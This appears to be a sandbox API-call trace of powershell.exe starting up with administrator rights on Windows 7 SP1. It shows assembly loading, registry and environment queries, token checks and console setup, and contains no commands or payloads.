	[0943.268] CoTaskMemAlloc (cb=0x66) returned 0x3eb0a0
	[0943.268] lstrcpyW (in: lpString1=0x3eb0a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0943.268] CoTaskMemFree (pv=0x3eb0a0) 
	[0943.268] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x0, puLen=0x1adeb0) returned 0
	[0943.268] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x0, puLen=0x1adeb0) returned 0
	[0943.268] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1adeb8, puLen=0x1adeb0 | out: lplpBuffer=0x1adeb8*=0x0, puLen=0x1adeb0) returned 0
	[0943.268] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ade88, puLen=0x1ade80 | out: lplpBuffer=0x1ade88*=0x2e52b04, puLen=0x1ade80) returned 1
	[0943.269] CoTaskMemAlloc (cb=0x204) returned 0x391c60
	[0943.269] VerLanguageNameW (in: wLang=0x0, szLang=0x391c60, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0943.269] CoTaskMemFree (pv=0x391c60) 
	[0943.269] VerQueryValueW (in: pBlock=0x2e52a68, lpSubBlock="\\", lplpBuffer=0x1aded8, puLen=0x1aded0 | out: lplpBuffer=0x1aded8*=0x2e52a90, puLen=0x1aded0) returned 1
	[0943.277] CoTaskMemAlloc (cb=0x104) returned 0x3d9040
	[0943.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.277] CoTaskMemFree (pv=0x3d9040) 
	[0943.278] CoTaskMemAlloc (cb=0x104) returned 0x3d9040
	[0943.278] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.278] CoTaskMemFree (pv=0x3d9040) 
	[0943.283] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1adda8 | out: phkResult=0x1adda8*=0x2e8) returned 0x0
	[0943.284] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1add98 | out: phkResult=0x1add98*=0x2ec) returned 0x0
	[0943.284] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ade28 | out: phkResult=0x1ade28*=0x2f0) returned 0x0
	[0943.287] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1add6c, lpData=0x0, lpcbData=0x1add68*=0x0 | out: lpType=0x1add6c*=0x1, lpData=0x0, lpcbData=0x1add68*=0x56) returned 0x0
	[0943.288] CoTaskMemAlloc (cb=0x5a) returned 0x3eb030
	[0943.288] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1add3c, lpData=0x3eb030, lpcbData=0x1add38*=0x56 | out: lpType=0x1add3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1add38*=0x56) returned 0x0
	[0943.288] CoTaskMemFree (pv=0x3eb030) 
	[0943.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0943.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0943.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0943.899] CoTaskMemAlloc (cb=0x104) returned 0x3d9040
	[0943.899] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0943.899] CoTaskMemFree (pv=0x3d9040) 
	[0946.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0946.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0947.407] CoTaskMemAlloc (cb=0x104) returned 0x3d9150
	[0947.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.407] CoTaskMemFree (pv=0x3d9150) 
	[0947.408] CoTaskMemAlloc (cb=0x104) returned 0x3d9150
	[0947.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0947.409] CoTaskMemFree (pv=0x3d9150) 
	[0948.059] CoTaskMemAlloc (cb=0x104) returned 0x3d9150
	[0948.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.059] CoTaskMemFree (pv=0x3d9150) 
	[0948.059] CoTaskMemAlloc (cb=0x104) returned 0x3d9150
	[0948.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.059] CoTaskMemFree (pv=0x3d9150) 
	[0948.059] CoTaskMemAlloc (cb=0x104) returned 0x3d9150
	[0948.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0948.059] CoTaskMemFree (pv=0x3d9150) 
	[0954.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0954.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0954.238] CoTaskMemAlloc (cb=0x104) returned 0x3d9150
	[0954.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.239] CoTaskMemFree (pv=0x3d9150) 
	[0954.240] CoTaskMemAlloc (cb=0x104) returned 0x3d9150
	[0954.240] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9150, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.240] CoTaskMemFree (pv=0x3d9150) 
	[0954.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0959.823] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0959.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0959.823] CoTaskMemFree (pv=0x3d9370) 
	[0960.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1adb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1adab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1adab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1adab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0960.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ada80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0960.519] SetErrorMode (uMode=0x1) returned 0x1
	[0960.519] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1add00 | out: lpFileInformation=0x1add00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0960.519] SetErrorMode (uMode=0x1) returned 0x1
	[0975.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1adb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1adab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1adab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.119] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0975.119] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.119] CoTaskMemFree (pv=0x3d9370) 
	[0975.122] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0975.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.122] CoTaskMemFree (pv=0x3d9370) 
	[0975.123] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0975.123] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.123] CoTaskMemFree (pv=0x3d9370) 
	[0975.125] CoCreateGuid (in: pguid=0x1ae0c8 | out: pguid=0x1ae0c8*(Data1=0x49fbb18, Data2=0x6002, Data3=0x4c99, Data4=([0]=0x87, [1]=0x82, [2]=0x58, [3]=0x99, [4]=0x43, [5]=0x64, [6]=0x81, [7]=0x54))) returned 0x0
	[0975.248] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0975.248] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.248] CoTaskMemFree (pv=0x3d9370) 
	[0975.251] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0975.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.251] CoTaskMemFree (pv=0x3d9370) 
	[0975.255] CoTaskMemAlloc (cb=0x104) returned 0x3d9370
	[0975.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d9370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0975.255] CoTaskMemFree (pv=0x3d9370) 
	[0975.271] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0975.273] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1add70 | out: lpConsoleScreenBufferInfo=0x1add70) returned 1
	[0975.292] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0975.399] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1add70 | out: lpConsoleScreenBufferInfo=0x1add70) returned 1
	[0975.400] GetVersionExW (in: lpVersionInformation=0x1add00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1add00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0975.403] GetCurrentProcess () returned 0xffffffffffffffff
	[0975.404] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1add98 | out: TokenHandle=0x1add98*=0x304) returned 1
	[0975.408] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adcb8 | out: TokenInformation=0x0, ReturnLength=0x1adcb8) returned 0
	[0975.409] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x39f930
	[0975.409] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x39f930, TokenInformationLength=0x4, ReturnLength=0x1adcb8 | out: TokenInformation=0x39f930, ReturnLength=0x1adcb8) returned 1
	[0975.409] DuplicateTokenEx (in: hExistingToken=0x304, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1ade18 | out: phNewToken=0x1ade18*=0x300) returned 1
	[0975.409] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adcb8 | out: TokenInformation=0x0, ReturnLength=0x1adcb8) returned 0
	[0975.409] GetTokenInformation (in: TokenHandle=0x304, TokenInformationClass=0x8, TokenInformation=0x39f960, TokenInformationLength=0x4, ReturnLength=0x1adcb8 | out: TokenInformation=0x39f960, ReturnLength=0x1adcb8) returned 1
	[0975.410] CheckTokenMembership (in: TokenHandle=0x300, SidToCheck=0x2f2d810*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1ade28 | out: IsMember=0x1ade28) returned 1
	[0975.410] CloseHandle (hObject=0x300) returned 1
	[0975.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.431] CoTaskMemAlloc (cb=0x804) returned 0x2a7c080
	[0975.431] GetConsoleTitleW (in: lpConsoleTitle=0x2a7c080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0975.629] CoTaskMemFree (pv=0x2a7c080) 
	[0975.654] CoTaskMemAlloc (cb=0x804) returned 0x2a7d930
	[0975.654] GetConsoleTitleW (in: lpConsoleTitle=0x2a7d930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0975.654] CoTaskMemFree (pv=0x2a7d930) 
	[0975.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.657] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0975.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0975.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0977.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0977.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0977.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0977.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0977.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
